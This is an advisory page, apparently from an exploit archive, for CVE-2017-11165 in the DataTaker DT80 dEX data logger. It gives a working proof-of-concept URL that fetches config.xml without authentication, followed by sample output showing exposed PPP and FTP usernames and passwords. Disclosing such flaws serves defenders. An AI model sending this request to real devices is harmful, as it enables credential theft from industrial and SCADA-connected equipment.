DataTaker DT80 dEX 1.50.012 Sensitive Configuration Exposure Vulnerability

🗓️ 12 Jul 2017 00:00:00Reported by Nassim AsrirType

zdt🔗 0day.today👁 50 Views

DataTaker DT80 dEX 1.50.012 Sensitive Configuration Exposure Vulnerability allows remote attackers to obtain sensitive configuration information via a direct request for the config.xml URI

Reporter	Title	Published	Views	Family All 12
Circl	CVE-2017-11165	30 Mar 202521:01	–	circl
CNVD	Thermo Fisher Scientific Thermo Fisher Scientific dataTaker DT80 dEX Information Disclosure Vulnerability	14 Jul 201700:00	–	cnvd
CVE	CVE-2017-11165	12 Jul 201712:00	–	cve
Cvelist	CVE-2017-11165	12 Jul 201712:00	–	cvelist
Exploit DB	DataTaker DT80 dEX 1.50.012 - Information Disclosure	11 Jul 201700:00	–	exploitdb
exploitpack	DataTaker DT80 dEX 1.50.012 - Information Disclosure	11 Jul 201700:00	–	exploitpack
Nuclei	DataTaker DT80 dEX 1.50.012 - Information Disclosure	11 Jun 202603:33	–	nuclei
NVD	CVE-2017-11165	12 Jul 201712:29	–	nvd
OSV	CVE-2017-11165	12 Jul 201712:29	–	osv
Packet Storm	DataTaker DT80 dEX 1.50.012 Sensitive Configuration Exposure	12 Jul 201700:00	–	packetstorm

[+] Title: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure
[+] Credits / Discovery: Nassim Asrir
[+] Author Contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: CVE-2017-11165
 
Vendor:
===============
 
http://www.datataker.com/
  
  
About:
========

The dataTaker DT80 smart data logger provides an extensive array of features that allow it to be used across a wide variety of applications. The DT80 is a robust, stand alone, low power data logger featuring USB memory stick support, 18 bit resolution, extensive communications capabilities and built-in display.

The dataTaker DT80as Dual Channel concept allows up to 10 isolated or 15 common referenced analog inputs to be used in many combinations. With support for multiple SDI-12 sensor networks, Modbus for SCADA systems, FTP and Web interface, 12V regulated output to power sensors, the DT80 is a totally self contained solution.  
  
Vulnerability Type:
===================
 
Sensitive Configurations Exposure.
 
 
issue:
===================
 
dataTaker dEX 1.350.012 allows remote attackers to obtain sensitive configuration information via
a direct request for the /services/getFile.cmd?userfile=config.xml URI.
  
POC:
===================

http://victim/services/getFile.cmd?userfile=config.xml


Output:
========

<config id="config" onReset="yes" projectFileVersion="2" targetDevice="DT80-3" targetSeries="3" cemCount="1" version="2.0">
<environment>
<application version="1.50.012" build="2014-01-07, 15:16:53"/>
<flashPlayer version="WIN 11.7.700.169" type="PlugIn(non-debugger)"/>
<operatingSystem version="Windows 7"/><firmware version="9.14.5407"/>
<screen resolution="1024x768"/>
</environment>

etc....

<loggerSetting category="PPP" profile="USER">username</loggerSetting>

<loggerSetting category="PPP" profile="PASSWORD">password</loggerSetting>

<loggerSetting category="FTP_SERVER" profile="PORT">21</loggerSetting>

<loggerSetting category="FTP_SERVER" profile="USER">arrdhor</loggerSetting>

<loggerSetting category="FTP_SERVER" profile="PASSWORD">arrdhor</loggerSetting>

<loggerSetting category="FTP_SERVER" profile="ALLOW_ANONYMOUS">YES</loggerSetting>

#  0day.today [2018-01-09]  #

12 Jul 2017 00:00Current

8.8High risk

Vulners AI Score8.8

EPSS0.91455